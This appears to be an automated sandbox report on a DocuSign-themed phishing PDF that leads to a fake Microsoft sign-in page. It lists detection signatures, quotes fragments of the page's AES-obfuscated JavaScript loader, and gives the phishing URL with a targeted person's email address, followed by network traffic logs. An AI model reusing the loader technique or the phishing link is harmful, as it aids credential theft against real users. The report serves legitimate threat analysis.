Windows Analysis Report
FIR-069114.pdf

Overview

General Information

Sample name: FIR-069114.pdf
Analysis ID: 1528939
MD5: efd4fd4aa538e7f0ff2f067c43f9ec38
SHA1: 6d7b8977db4399facfa7b79f3435dd228b844d26
SHA256: a13c4107db0fceb9314a426a37ba69e178a9958dd584bd6c0dde740629fdb108
Infos:

Detection

HTMLPhisher
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish70
AI detected landing page (webpage, office document or email)
HTML page contains suspicious javascript code
Phishing site detected (based on logo match)
Suspicious PDF detected (based on various text indicators)
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Invalid T&C link found
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Uses insecure TLS / SSL version for HTTPS connection

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com SlashNext: Label: Credential Stealing type: Phishing & Social Engineering

Phishing
barindex
Yara detected HtmlPhish70
Source: Yara match File source: 0.0.pages.csv, type: HTML
Source: Yara match File source: dropped/chromecache_194, type: DROPPED
HTML page contains suspicious javascript code
Source: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com HTTP Parser: window.location.href = atob(
Phishing site detected (based on logo match)
Source: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com Matcher: Template: microsoft matched
Suspicious PDF detected (based on various text indicators)
Source: Adobe Acrobat PDF OCR Text: DocuSign A document has been sent to you. To view the details of your document, click the button below. REVIEW DOCUMENT Please click the 'Review Document' button to view the document sent to you. Thank you for choosing DocuSign. Do Not Share This Email This email contains a secure link to DocuSign Please do not share this email, link, or access code with others About DocuSign Sign documents electronically in just minutes It's safe, secure, and legally binding Whether you're in an office, at home, on-the-go or even across the globe DocuSign provides a professional trusted solution for Digital Transaction Management CONFIDENT/AL/TY NOT/CE This message (including any attachments) contains information that may be confidential. Unless you are the intended recipient (or authorized to receive for the intended recipient), you may not read, print, retain, use, copy, distribute or disclose to anyone the message or any information contained in the message. If you have received the message in error, please advise the sender by reply e-mail, and destroy a// copies of the origina/ message (including any attachments). .
HTML body contains low number of good links
Source: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com HTTP Parser: Number of links: 0
HTML body with high number of embedded images detected
Source: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com HTTP Parser: Total embedded image size: 45687
HTML page contains hidden javascript code
Source: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com HTTP Parser: Base64 decoded: {"a":"cVxl8uul8JHhmZNn2zSK7lUADm3i2X38zQTwdGXJv64=","c":"3c151f22e7547f899e1a3a686dd27d80","b":"86694dbe3e8cd7ac4103acb81f0d23f02b7e467f8c9e57a88492667f63e5a911c6aa877942cc0da8b6cda4879338826262e93cc2146829064947982db7205f2ba90c8166714c4f2c1bcc6b168fa41b9...
HTML title does not match URL
Source: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com HTTP Parser: Title: sign-in for secure access does not match URL
Invalid T&C link found
Source: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com HTTP Parser: Invalid link: Fruits help reduce the risk of heart disease and cancer.
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Source: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com HTTP Parser: async functionnamesake(wainwright) { var {a,b,c,d}= json.parse(wainwright); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher:cryptojs.algo.sha512,keysize: 64/8, iterations: 999}), {iv:cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } asyncfunction sable() {paean.hidden= 0; haggardness.hidden = 1; document.write(awaitnamesake(await(awaitfetch(await namesake(atob(`eyjhijoiy1z4bdh1dww4skhobvpobjj6u0s3bfvbrg0zatjymzh6uvr3zedysny2nd0ilcjjijoim2mxntfmmjjlnzu0n2y4otllmwezyty4nmrkmjdkodailcjiijoiody2otrkymuzzthjzddhyzqxmdnhy2i4mwywzdizzjayyjdlndy3zjhjowu1n2e4odq5mjy2n2y2m2u1ytkxmwm2ywe4nzc5ndjjyzbkythinmnkytq4nzkzmzg4mjyynjjlotnjyzixndy4mjkwnjq5ndc5odjkyjcymdvmmmjhotbjode2njcxngm0zjjjmwjjyzzimty4zme0mwi5mjg5zgqxn2fmotizowy0ywnkoty0zmuxzde1ngiyntrhy2eyoteynzcwnjzkztkwndviodc2zdi0oda2zgqzotcymti3mjgynzi5n2i4nddhmdk5ogm3zwi0ztvlntaxywzmytczytc2zdbmzmvkogi4otm3njc0mmu4nmezode3ywezyze4mju1mmvko...
Source: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com HTTP Parser: No favicon
Source: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com HTTP Parser: No favicon
Source: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com HTTP Parser: No <meta name="author".. found
Source: https://ui83ir9eoifdeoi.s3.ap-northeast-2.amazonaws.com/Y8683YUIEF9URORUH9S0IPT40EGG8YTI43RGJ0EPEFWORE8IUGRJEMMPR.html#Jalastair.campbell@charlestaylor.com HTTP Parser: No <meta name="copyright".. found
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:57567 version: TLS 1.0
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:57510 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:57518 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:57622 version: TLS 1.2
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.5:57376 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.5:56510 -> 1.1.1.1:53
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.118.8.172 104.118.8.172
Source: Joe Sandbox View IP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox View IP Address: 151.101.2.137 151.101.2.137
Source: Joe Sandbox View IP Address: 151.101.2.137 151.101.2.137
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:57567 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.60
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=39Fb6mLGaHG6fFp&MD=n7Ompvnf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120100v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
